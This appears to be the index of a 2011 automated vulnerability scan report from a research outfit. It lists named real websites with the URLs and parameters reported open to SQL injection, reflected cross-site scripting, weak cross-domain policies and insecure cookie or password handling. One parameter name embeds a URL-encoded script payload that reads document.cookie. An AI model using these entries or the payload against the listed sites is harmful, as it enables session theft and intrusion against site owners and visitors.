XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05152011-03

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Sun May 15 10:53:23 CDT 2011.


1. SQL injection

1.1. http://www.cvtelecom.cv/ [name of an arbitrarily supplied request parameter]

1.2. http://www.oscommerce.com/about/news,135 [REST URL parameter 2]

2. HTTP header injection

3. Cross-site scripting (reflected)

3.1. http://a.ligatus.com/timeout.php [ids parameter]

3.2. http://a.ligatus.com/timeout.php [name of an arbitrarily supplied request parameter]

3.3. http://bid.openx.net/json [c parameter]

3.4. http://content-interface.iinet.net.au/async/content/browse/westnet/fetchtv [jsoncallback parameter]

3.5. http://content-interface.iinet.net.au/async/content/play/video/high/5619 [jsoncallback parameter]

3.6. http://ds.addthis.com/red/psi/sites/www.eshopfitters.co.uk/p.json [callback parameter]

3.7. http://image.providesupport.com/cmd/chatcisp1 [REST URL parameter 1]

3.8. http://image.providesupport.com/cmd/corecommerce [REST URL parameter 1]

3.9. http://image.providesupport.com/js/chatcisp1/safe-monitor.js [REST URL parameter 1]

3.10. http://image.providesupport.com/js/chatcisp1/safe-monitor.js [REST URL parameter 2]

3.11. http://image.providesupport.com/js/corecommerce/safe-standard.js [REST URL parameter 1]

3.12. http://image.providesupport.com/js/corecommerce/safe-standard.js [REST URL parameter 2]

3.13. http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard [mbox parameter]

3.14. http://js.revsci.net/gateway/gw.js [csid parameter]

3.15. http://mods4rides.com/ [name of an arbitrarily supplied request parameter]

3.16. http://onebox.extole.com/offers/23073174/share [extra_url_query_string parameter]

3.17. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

3.18. https://shop.widevoip.com/authentication.php [REST URL parameter 1]

3.19. https://shop.widevoip.com/authentication.php [back parameter]

3.20. https://shop.widevoip.com/authentication.php [name of an arbitrarily supplied request parameter]

3.21. https://shop.widevoip.com/cart.php [REST URL parameter 1]

3.22. https://shop.widevoip.com/img/favicon.ico [REST URL parameter 1]

3.23. https://shop.widevoip.com/img/favicon.ico [REST URL parameter 2]

3.24. https://shop.widevoip.com/index.php/index.php [REST URL parameter 1]

3.25. https://shop.widevoip.com/index.php/index.php [REST URL parameter 2]

3.26. https://shop.widevoip.com/index.php/index.php [name of an arbitrarily supplied request parameter]

3.27. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php [REST URL parameter 1]

3.28. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php [REST URL parameter 2]

3.29. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php [REST URL parameter 3]

3.30. https://shop.widevoip.com/order.php [REST URL parameter 1]

3.31. https://shop.widevoip.com/order.php [name of an arbitrarily supplied request parameter]

3.32. https://shop.widevoip.com/order.php [step parameter]

3.33. https://shop.widevoip.com/prices-drop.php [REST URL parameter 1]

3.34. https://shop.widevoip.com/prices-drop.php [name of an arbitrarily supplied request parameter]

3.35. http://shops.oscommerce.com/live_shops_frameset_header.php [name of an arbitrarily supplied request parameter]

3.36. http://shops.oscommerce.com/live_shops_frameset_header.php [url parameter]

3.37. http://store.mandriva.com/ [action parameter]

3.38. http://store.mandriva.com/ [name of an arbitrarily supplied request parameter]

3.39. http://store.mandriva.com/product_info.php [action parameter]

3.40. http://store.mandriva.com/product_info.php [name of an arbitrarily supplied request parameter]

3.41. http://store.mandriva.com/product_info.php [name of an arbitrarily supplied request parameter]

3.42. http://store.mandriva.com/product_info.php [products_id parameter]

3.43. http://tvgids.upc.nl/scheduleApi/api/Channel/7J%7C6s%7C7G%7C7K%7C7L/events/NowAndNext.json [callback parameter]

3.44. http://webchat.rockliffe.com:9090/webchat/live [action parameter]

3.45. http://www.allvoip.gr/ [name of an arbitrarily supplied request parameter]

3.46. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]

3.47. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]

3.48. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]

3.49. http://www.ekko.ws/favicon.ico [REST URL parameter 1]

3.50. http://www.ekko.ws/favicon.ico [REST URL parameter 1]

3.51. http://www.ekko.ws/favicon.ico [REST URL parameter 1]

3.52. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]

3.53. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]

3.54. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]

3.55. http://www.grics.qc.ca/favicon.ico [REST URL parameter 1]

3.56. http://www.grics.qc.ca/fr/produits/eleve-jeune/gpi.aspx [REST URL parameter 4]

3.57. http://www.grics.qc.ca/images/favicon.ico [REST URL parameter 1]

3.58. http://www.grics.qc.ca/images/favicon.ico [REST URL parameter 2]

3.59. http://www.internetnatrgovina.com/ [name of an arbitrarily supplied request parameter]

3.60. http://www.internetnatrgovina.com/ [name of an arbitrarily supplied request parameter]

3.61. http://www.mailsite.com/common/reporterror.asp [Company parameter]

3.62. http://www.mailsite.com/common/reporterror.asp [Email parameter]

3.63. http://www.mailsite.com/common/reporterror.asp [Name parameter]

3.64. http://www.mailsite.com/common/reporterror.asp [Phone parameter]

3.65. http://www.mailsite.com/common/reporterror.asp [Subject parameter]

3.66. http://www.mailsite.com/common/reporterror.asp [WebPage parameter]

3.67. http://www.mailsite.com/common/reporterror.asp [webpage parameter]

3.68. http://www.mailsite.com/portal/trial.asp [Company parameter]

3.69. http://www.mailsite.com/portal/trial.asp [Email parameter]

3.70. http://www.mailsite.com/portal/trial.asp [Email2 parameter]

3.71. http://www.mailsite.com/portal/trial.asp [Ext parameter]

3.72. http://www.mailsite.com/portal/trial.asp [FirstName parameter]

3.73. http://www.mailsite.com/portal/trial.asp [LastName parameter]

3.74. http://www.mailsite.com/portal/trial.asp [MailboxQty parameter]

3.75. http://www.mailsite.com/portal/trial.asp [Phone parameter]

3.76. http://www.mailsite.com/portal/trial.asp [SourceDesc parameter]

3.77. http://www.mailsite.com/portal/trial.asp [StateText parameter]

3.78. http://www.mailsite.com/portal/trial.asp [UserName parameter]

3.79. http://www.mailsite.com/portal/trial.asp [Website parameter]

3.80. http://www.mailsite.com/portal/trial.asp [Zip parameter]

3.81. http://www.mailsite.com/portal/trial.asp [key parameter]

3.82. http://www.munichmyway.com/ecommerce/products/prodDetail.cfm [t parameter]

3.83. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue100 parameter]

3.84. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue101 parameter]

3.85. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue102 parameter]

3.86. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue103 parameter]

3.87. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue104 parameter]

3.88. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue234 parameter]

3.89. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue89 parameter]

3.90. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue90 parameter]

3.91. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue91 parameter]

3.92. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue92 parameter]

3.93. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue93 parameter]

3.94. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue94 parameter]

3.95. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue95 parameter]

3.96. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue96 parameter]

3.97. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue97 parameter]

3.98. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue98 parameter]

3.99. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue99 parameter]

3.100. http://www.munichmyway.com/templates/common/products/productProperties.cfm [id parameter]

3.101. http://www.oscommerce-manager.com/ [8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d parameter]

3.102. http://www.oscommerce-manager.com/ [name of an arbitrarily supplied request parameter]

3.103. http://www.oscommerce-manager.com/PAGE-70.html [REST URL parameter 1]

3.104. http://www.oscommerce-manager.com/misc/drupal.js [REST URL parameter 1]

3.105. http://www.oscommerce-manager.com/misc/drupal.js [REST URL parameter 2]

3.106. http://www.oscommerce-manager.com/misc/jquery.js [REST URL parameter 1]

3.107. http://www.oscommerce-manager.com/misc/jquery.js [REST URL parameter 2]

3.108. http://www.oscommerce-manager.com/modules/aggregator/aggregator.css [REST URL parameter 1]

3.109. http://www.oscommerce-manager.com/modules/aggregator/aggregator.css [REST URL parameter 2]

3.110. http://www.oscommerce-manager.com/modules/aggregator/aggregator.css [REST URL parameter 3]

3.111. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 1]

3.112. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 2]

3.113. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 3]

3.114. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 4]

3.115. http://www.oscommerce-manager.com/modules/book/book.css [REST URL parameter 1]

3.116. http://www.oscommerce-manager.com/modules/book/book.css [REST URL parameter 2]

3.117. http://www.oscommerce-manager.com/modules/book/book.css [REST URL parameter 3]

3.118. http://www.oscommerce-manager.com/modules/fckeditor/fckeditor.css [REST URL parameter 1]

3.119. http://www.oscommerce-manager.com/modules/fckeditor/fckeditor.css [REST URL parameter 2]

3.120. http://www.oscommerce-manager.com/modules/fckeditor/fckeditor.css [REST URL parameter 3]

3.121. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 1]

3.122. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 2]

3.123. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 3]

3.124. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 4]

3.125. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 1]

3.126. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 2]

3.127. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 3]

3.128. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 4]

3.129. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 1]

3.130. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 2]

3.131. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 3]

3.132. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 4]

3.133. http://www.oscommerce-manager.com/modules/node/node.css [REST URL parameter 1]

3.134. http://www.oscommerce-manager.com/modules/node/node.css [REST URL parameter 2]

3.135. http://www.oscommerce-manager.com/modules/node/node.css [REST URL parameter 3]

3.136. http://www.oscommerce-manager.com/modules/system/defaults.css [REST URL parameter 1]

3.137. http://www.oscommerce-manager.com/modules/system/defaults.css [REST URL parameter 2]

3.138. http://www.oscommerce-manager.com/modules/system/defaults.css [REST URL parameter 3]

3.139. http://www.oscommerce-manager.com/modules/system/system-menus.css [REST URL parameter 1]

3.140. http://www.oscommerce-manager.com/modules/system/system-menus.css [REST URL parameter 2]

3.141. http://www.oscommerce-manager.com/modules/system/system-menus.css [REST URL parameter 3]

3.142. http://www.oscommerce-manager.com/modules/system/system.css [REST URL parameter 1]

3.143. http://www.oscommerce-manager.com/modules/system/system.css [REST URL parameter 2]

3.144. http://www.oscommerce-manager.com/modules/system/system.css [REST URL parameter 3]

3.145. http://www.oscommerce-manager.com/modules/user/user.css [REST URL parameter 1]

3.146. http://www.oscommerce-manager.com/modules/user/user.css [REST URL parameter 2]

3.147. http://www.oscommerce-manager.com/modules/user/user.css [REST URL parameter 3]

3.148. http://www.oscommerce-manager.com/order [REST URL parameter 1]

3.149. http://www.oscommerce-manager.com/order [name of an arbitrarily supplied request parameter]

3.150. http://www.oscommerce-manager.com/thank-you-purchasing-magneticone-product [REST URL parameter 1]

3.151. http://www.oscommerce-manager.com/thank-you-purchasing-magneticone-product [name of an arbitrarily supplied request parameter]

3.152. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 1]

3.153. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 2]

3.154. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 3]

3.155. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 4]

3.156. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [name of an arbitrarily supplied request parameter]

3.157. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 1]

3.158. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 2]

3.159. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 3]

3.160. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [REST URL parameter 4]

3.161. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [name of an arbitrarily supplied request parameter]

3.162. http://www.oscommerce-manager.com/themes/oscmanager/main.css [REST URL parameter 1]

3.163. http://www.oscommerce-manager.com/themes/oscmanager/main.css [REST URL parameter 2]

3.164. http://www.oscommerce-manager.com/themes/oscmanager/main.css [REST URL parameter 3]

3.165. http://www.oscommerce-manager.com/themes/oscmanager/style.css [REST URL parameter 1]

3.166. http://www.oscommerce-manager.com/themes/oscmanager/style.css [REST URL parameter 2]

3.167. http://www.oscommerce-manager.com/themes/oscmanager/style.css [REST URL parameter 3]

3.168. https://www.regnow.com/checkout/cart/edit [bill_addr.country parameter]

3.169. https://www.regnow.com/checkout/cart/edit [bill_addr.state parameter]

3.170. https://www.regnow.com/checkout/cart/edit [cc_exp_month parameter]

3.171. https://www.regnow.com/checkout/cart/edit [cc_exp_year parameter]

3.172. https://www.regnow.com/checkout/cart/edit [payment_type_def_id parameter]

3.173. https://www.regnow.com/checkout/cart/edit [ship_addr.country parameter]

3.174. https://www.regnow.com/checkout/cart/edit [ship_addr.state parameter]

3.175. http://www.vitexo.de/support/server.php [browid parameter]

3.176. http://www.vitexo.de/support/server.php [livezilla parameter]

3.177. http://www.vitexo.de/support/server.php [start parameter]

3.178. http://www.wiktel.com/events.php [bgColor parameter]

3.179. http://www.wiktel.com/events.php [name of an arbitrarily supplied request parameter]

3.180. http://www.yourwebsitevalue.com/getsearchbox.cgi [Referer HTTP header]

3.181. http://image.providesupport.com/js/chatcisp1/safe-monitor.js [vsid cookie]

3.182. http://image.providesupport.com/js/corecommerce/safe-standard.js [vsid cookie]

3.183. http://seg.sharethis.com/getSegment.php [__stid cookie]

3.184. http://store.mandriva.com/ [osCsid cookie]

3.185. http://store.mandriva.com/g/style/base-min.css [osCsid cookie]

3.186. http://store.mandriva.com/g/style/reset-fonts-grids.css [osCsid cookie]

3.187. http://store.mandriva.com/just_added.php [osCsid cookie]

3.188. http://store.mandriva.com/product_info.php [osCsid cookie]

3.189. http://store.mandriva.com/product_info.php [osCsid cookie]

3.190. http://www.vehix.com/ [physicalzip cookie]

3.191. http://www.vehix.com/default.aspx [physicalzip cookie]

4. Flash cross-domain policy

4.1. http://ad.doubleclick.net/crossdomain.xml

4.2. http://ajax.googleapis.com/crossdomain.xml

4.3. http://c.gelifesciences.com/crossdomain.xml

4.4. http://cfe713.r.axf8.net/crossdomain.xml

4.5. http://d.xp1.ru4.com/crossdomain.xml

4.6. http://d1.openx.org/crossdomain.xml

4.7. http://fls.doubleclick.net/crossdomain.xml

4.8. http://h41174.www4.hp.com/crossdomain.xml

4.9. http://idcs.interclick.com/crossdomain.xml

4.10. http://iinet.122.2o7.net/crossdomain.xml

4.11. http://j2global.122.2o7.net/crossdomain.xml

4.12. http://js.revsci.net/crossdomain.xml

4.13. http://media.extole.com/crossdomain.xml

4.14. http://met1.hp.com/crossdomain.xml

4.15. http://now.eloqua.com/crossdomain.xml

4.16. http://onebox.extole.com/crossdomain.xml

4.17. http://pixel.fetchback.com/crossdomain.xml

4.18. http://pro.hit.gemius.pl/crossdomain.xml

4.19. http://r.turn.com/crossdomain.xml

4.20. http://segment-pixel.invitemedia.com/crossdomain.xml

4.21. http://upc.d2.sc.omtrdc.net/crossdomain.xml

4.22. http://www.burstnet.com/crossdomain.xml

4.23. http://www.odesk.com/crossdomain.xml

4.24. http://a.ligatus.com/crossdomain.xml

4.25. http://d.ligatus.com/crossdomain.xml

4.26. http://edge.sharethis.com/crossdomain.xml

4.27. http://feeds.bbci.co.uk/crossdomain.xml

4.28. http://googleads.g.doubleclick.net/crossdomain.xml

4.29. http://hc2.humanclick.com/crossdomain.xml

4.30. http://newsrss.bbc.co.uk/crossdomain.xml

4.31. http://pagead2.googlesyndication.com/crossdomain.xml

4.32. http://pubads.g.doubleclick.net/crossdomain.xml

4.33. http://tvgids.upc.nl/crossdomain.xml

4.34. http://w.sharethis.com/crossdomain.xml

4.35. http://www.hp.com/crossdomain.xml

4.36. http://www.upc.nl/crossdomain.xml

4.37. http://www.youtube.com/crossdomain.xml

4.38. http://t.tmimgcdn.com/crossdomain.xml

4.39. http://www.templatemonster.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://c.gelifesciences.com/clientaccesspolicy.xml

5.3. http://iinet.122.2o7.net/clientaccesspolicy.xml

5.4. http://j2global.122.2o7.net/clientaccesspolicy.xml

5.5. http://met1.hp.com/clientaccesspolicy.xml

5.6. http://upc.d2.sc.omtrdc.net/clientaccesspolicy.xml

5.7. http://d.ligatus.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://forum.mailsite.com/

6.2. http://www.ekkows.0479228880.com/

6.3. http://www.host7x24.com/auth/login.php

6.4. http://www.internetnatrgovina.com/

6.5. http://www.mailsite.com/portal/

6.6. http://www.mailsite.com/portal/cases/

6.7. http://www.mailsite.com/portal/cases/cases.asp

6.8. http://www.mailsite.com/portal/download.asp

6.9. http://www.mailsite.com/portal/unsubscribe.asp

6.10. http://www.mailsite.com/portal/updateprofile.asp

6.11. http://www.mavi1.org/forum/

6.12. http://www.mmabasket.com/

6.13. http://www.siyamiozkan.com.tr/forum/

7. SSL cookie without secure flag set

7.1. https://myaccount.westnet.com.au/Login.aspx

7.2. https://secure1.wn.com.au/passwordrecovery/

7.3. https://webmail.westnet.com.au/

7.4. https://www.new.onebox.com/ereceptionist-api/signup/getAllOBRatePlans

7.5. https://www.new.onebox.com/ereceptionist-api/signup/getSessionCurrency

7.6. https://www.new.onebox.com/features/mobile-apps/android

7.7. https://www.new.onebox.com/features/mobile-apps/blackberry

7.8. https://www.new.onebox.com/features/mobile-apps/iphone

7.9. https://www.new.onebox.com/login

7.10. https://www.new.onebox.com/pricing-receptionist_b

7.11. https://shop.widevoip.com/cart.php

7.12. https://shop.widevoip.com/index.php/index.php

7.13. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php

7.14. https://www.regnow.com/checkout/cart/edit

7.15. https://www.regnow.com/checkout/cart/new/13799-1/13799-2

7.16. https://www.regnow.com/checkout/cart/view

8. Session token in URL

8.1. http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard

8.2. http://l.sharethis.com/pview

8.3. http://onebox.extole.com/offers/23073174/share

8.4. https://shop.widevoip.com/authentication.php

8.5. https://shop.widevoip.com/cart.php

8.6. https://shop.widevoip.com/index.php/index.php

8.7. https://shop.widevoip.com/prices-drop.php

8.8. http://www.facebook.com/extern/login_status.php

8.9. http://www.host7x24.com/auth/login.php

9. SSL certificate

9.1. https://www.widevoip.com/

9.2. https://mobile.westnet.com.au/

9.3. https://secure1.wn.com.au/

9.4. https://shop.widevoip.com/

9.5. https://www.regnow.com/

10. Cookie scoped to parent domain

10.1. http://count1.123stat.com/count.pl

10.2. http://cts-log.channelintelligence.com/

10.3. http://forums.oscommerce.com/

10.4. http://www.cvtelecom.cv/

10.5. http://www.host7x24.com/auth/login.php

10.6. http://www.host7x24.com/favicon.ico

10.7. http://www.oscommerce-manager.com/

10.8. http://www.servercentral.com/

10.9. http://a.triggit.com/pxoxicm

10.10. http://action.media6degrees.com/orbserv/hbjs

10.11. http://ad.trafficmp.com/a/bpix

10.12. http://ad.trafficmp.com/a/bpix

10.13. http://ads.revsci.net/adserver/ako

10.14. http://adserver.veruta.com/track.fcgi

10.15. http://ak1.abmr.net/is/www.burstnet.com

10.16. http://b.scorecardresearch.com/b

10.17. http://b.scorecardresearch.com/r

10.18. http://bid.openx.net/json

10.19. http://bid.openx.net/jstag

10.20. http://c.gelifesciences.com/b/ss/gelifegelifeprod/1/H.15.1/s61482006243895

10.21. http://cf.addthis.com/red/p.json

10.22. http://finans.turk.net/borsa/

10.23. http://g-pixel.invitemedia.com/gmatcher

10.24. http://h41174.www4.hp.com/4/hp/us/en/commercial/presales.awareness/services/all/%7C/r61/%7Cus/en/services/it-services.html/1314572112@x01,x02,x31,x32,x33,Top1,Top2,Top3,Top,Left1,Left2,Left3,x04,x41,x42,x43,x44,x45,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Frame1,Frame2,x11,x12,x13,x14,x15

10.25. http://i.w55c.net/rs

10.26. http://ib.adnxs.com/seg

10.27. http://image.providesupport.com/js/chatcisp1/safe-monitor.js

10.28. http://js.revsci.net/gateway/gw.js

10.29. http://leadback.advertising.com/adcedge/lb

10.30. http://media.fastclick.net/w/tre

10.31. http://met1.hp.com/b/ss/hphqglobal,hpcsamerus,hpcsglobal,hphqna,hphqwwesg,hpcstsg/1/H.22/s64758445019833

10.32. http://mngimng.112.2o7.net/b/ss/mngimng/1/H.17/s61455768113955

10.33. http://pix04.revsci.net/D08734/a1/0/0/0.gif

10.34. http://pix04.revsci.net/H05525/b3/0/3/1003161/484270256.js

10.35. http://pixel.fetchback.com/serve/fb/pdc

10.36. http://pixel.fetchback.com/serve/fb/ver

10.37. http://pixel.quantserve.com/pixel

10.38. http://pro.hit.gemius.pl/*/_1305465394383/rexdot.gif

10.39. http://pro.hit.gemius.pl/_1305465394383/rexdot.gif

10.40. http://pro.hit.gemius.pl/_1305465782281/rexdot.gif

10.41. http://pro.hit.gemius.pl/_1305465906407/rexdot.gif

10.42. http://r.turn.com/r/beacon

10.43. http://rs.gwallet.com/r1/pixel/x373

10.44. http://segment-pixel.invitemedia.com/pixel

10.45. http://statsomni.vehix.com/b/ss/vehixglobal/1/H.15.1/s68731433965731

10.46. http://tags.mediaforge.com/js/189

10.47. http://tracker.marinsm.com/tp

10.48. http://www.allvoip.gr/

10.49. http://www.bigcommerce.com/bigcommerce-vs-oscommerce.php

10.50. http://www.ekkows.0479228880.com/

10.51. http://www.eshopfitters.co.uk/

10.52. http://www.internetnatrgovina.com/

10.53. http://www.mavi1.org/forum/

10.54. http://www.mavideniz1.org/forum/

10.55. http://www.mmabasket.com/

10.56. http://www.sapiens.co.uk/

11. Cookie without HttpOnly flag set

11.1. http://action.media6degrees.com/orbserv/hbjs

11.2. http://content-interface.iinet.net.au/async/content/browse/westnet/fetchtv

11.3. http://count1.123stat.com/count.pl

11.4. http://cts-log.channelintelligence.com/

11.5. http://finans.turk.net/altin/

11.6. http://finans.turk.net/borsa/

11.7. http://forum.mailsite.com/

11.8. http://freezone.iinet.net.au/channels/freezone-partners

11.9. http://host7x24.com/customer/index.php

11.10. http://myhelp.westnet.com.au/pages/releaseview.action

11.11. http://onebox.extole.com/offers/23073174/start

11.12. http://support.magneticone.com/visitor/index.php

11.13. http://www.active24.co.uk/

11.14. http://www.active24.co.uk/custom_asp/info.asp

11.15. http://www.active24.com/

11.16. http://www.bigcommerce.com/bigcommerce-vs-oscommerce.php

11.17. http://www.cardinal.com/businesses/medicineshoppe/

11.18. http://www.cisp.com/default.asp

11.19. http://www.cvtelecom.cv/

11.20. http://www.grics.qc.ca/

11.21. http://www.host7x24.com/auth/login.php

11.22. http://www.host7x24.com/favicon.ico

11.23. http://www.mailsite.com/

11.24. http://www.mailsite.com/company/customers.asp

11.25. http://www.mailsite.com/products/mailsite-email-and-calendar-server-software.asp

11.26. http://www.munichmyway.com/

11.27. http://www.munichmyway.com/favicon.ico

11.28. http://www.new.onebox.com/home

11.29. http://www.new.onebox.com/how-it-works

11.30. http://www.new.onebox.com/pricing-receptionist

11.31. https://www.new.onebox.com/ereceptionist-api/signup/getAllOBRatePlans

11.32. https://www.new.onebox.com/ereceptionist-api/signup/getSessionCurrency

11.33. https://www.new.onebox.com/features/mobile-apps/android

11.34. https://www.new.onebox.com/features/mobile-apps/blackberry

11.35. https://www.new.onebox.com/features/mobile-apps/iphone

11.36. https://www.new.onebox.com/login

11.37. https://www.new.onebox.com/pricing-receptionist_b

11.38. http://www.onbile.com/websites/0521accad976e199620f2fe160d311fa

11.39. http://www.onebox.com/

11.40. http://www.oscommerce-manager.com/

11.41. http://www.redstage.com/magento2/

11.42. http://www.servercentral.com/

11.43. http://www.telecom.pt/

11.44. http://www.teleflora.com/

11.45. http://www.templatemonster.com/oscommerce-templates.php

11.46. http://www.turk.net/

11.47. http://www8.hp.com/us/en/services/it-services.html

11.48. http://www8.hp.com/us/en/services/services-detail.html

11.49. http://www8.hp.com/us/en/system/include/ladybug.jsp

11.50. http://a.triggit.com/pxoxicm

11.51. http://ad.trafficmp.com/a/bpix

11.52. http://ad.trafficmp.com/a/bpix

11.53. http://ad.yieldmanager.com/pixel

11.54. http://ads.revsci.net/adserver/ako

11.55. http://adserver.veruta.com/track.fcgi

11.56. http://ak1.abmr.net/is/www.burstnet.com

11.57. http://allvoip.gr//live_support/statusimage.php

11.58. http://b.scorecardresearch.com/b

11.59. http://b.scorecardresearch.com/r

11.60. http://bid.openx.net/json

11.61. http://bid.openx.net/jstag

11.62. http://c.gelifesciences.com/b/ss/gelifegelifeprod/1/H.15.1/s61482006243895

11.63. http://cf.addthis.com/red/p.json

11.64. http://d1.openx.org/ajs.php

11.65. http://d1.openx.org/lg.php

11.66. http://g-pixel.invitemedia.com/gmatcher

11.67. http://h10134.www1.hp.com/

11.68. http://h41174.www4.hp.com/4/hp/us/en/commercial/presales.awareness/services/all/%7C/r61/%7Cus/en/services/it-services.html/1314572112@x01,x02,x31,x32,x33,Top1,Top2,Top3,Top,Left1,Left2,Left3,x04,x41,x42,x43,x44,x45,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Frame1,Frame2,x11,x12,x13,x14,x15

11.69. http://hc2.humanclick.com/hc/81994923/

11.70. http://hc2.humanclick.com/hc/81994923/

11.71. http://i.w55c.net/rs

11.72. http://iinet.122.2o7.net/b/ss/iinet-wn-prd,%20iinet-westnet-prd/1/H.21/s66183478690218

11.73. http://image.providesupport.com/js/chatcisp1/safe-monitor.js

11.74. http://intelligence.dgmsearchlab.com/xdom/readcook.ashx

11.75. http://j2global.122.2o7.net/b/ss/j2globalonebox/1/H.23.3/s62614785584155

11.76. http://js.revsci.net/gateway/gw.js

11.77. http://leadback.advertising.com/adcedge/lb

11.78. http://media.fastclick.net/w/tre

11.79. http://met1.hp.com/b/ss/hphqglobal,hpcsamerus,hpcsglobal,hphqna,hphqwwesg,hpcstsg/1/H.22/s64758445019833

11.80. http://mngimng.112.2o7.net/b/ss/mngimng/1/H.17/s61455768113955

11.81. http://mods4rides.com/

11.82. http://pix04.revsci.net/D08734/a1/0/0/0.gif

11.83. http://pix04.revsci.net/H05525/b3/0/3/1003161/484270256.js

11.84. http://pixel.fetchback.com/serve/fb/pdc

11.85. http://pixel.fetchback.com/serve/fb/ver

11.86. http://pixel.quantserve.com/pixel

11.87. http://printingcanvas.co.uk/

11.88. http://pro.hit.gemius.pl/*/_1305465394383/rexdot.gif

11.89. http://pro.hit.gemius.pl/_1305465394383/rexdot.gif

11.90. http://pro.hit.gemius.pl/_1305465782281/rexdot.gif

11.91. http://pro.hit.gemius.pl/_1305465906407/rexdot.gif

11.92. http://r.turn.com/r/beacon

11.93. http://rs.gwallet.com/r1/pixel/x373

11.94. http://segment-pixel.invitemedia.com/pixel

11.95. https://shop.widevoip.com/cart.php

11.96. https://shop.widevoip.com/index.php/index.php

11.97. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php

11.98. http://smartsourcecollector.cardinal.com/dcsk07f7w00000kvtj6ne2kwn_1y4m/dcs.gif

11.99. http://smartsourcecollector.cardinal.com/dcsk07f7w00000kvtj6ne2kwn_1y4m/dcs.gif

11.100. http://statsomni.vehix.com/b/ss/vehixglobal/1/H.15.1/s68731433965731

11.101. http://store.mandriva.com/

11.102. http://tags.mediaforge.com/js/189

11.103. http://telefloracom.112.2o7.net/b/ss/telefloracom/1/H.20.3/s66253762478008

11.104. http://tracker.marinsm.com/tp

11.105. http://upc.d2.sc.omtrdc.net/b/ss/upcnl/1/H.22.1/s73489850417245

11.106. http://whatsonsingapore.com/

11.107. http://www.acceleart.com/shop/

11.108. http://www.accesscontrolid.com/catalog/index.php

11.109. http://www.active24.co.uk/sw22729.asp

11.110. http://www.allvoip.gr/

11.111. http://www.amberetc.co.uk/ws/

11.112. http://www.amershambiosciences.com/

11.113. http://www.brodit24.de/

11.114. http://www.burstnet.com/enlightn/3847/F156/

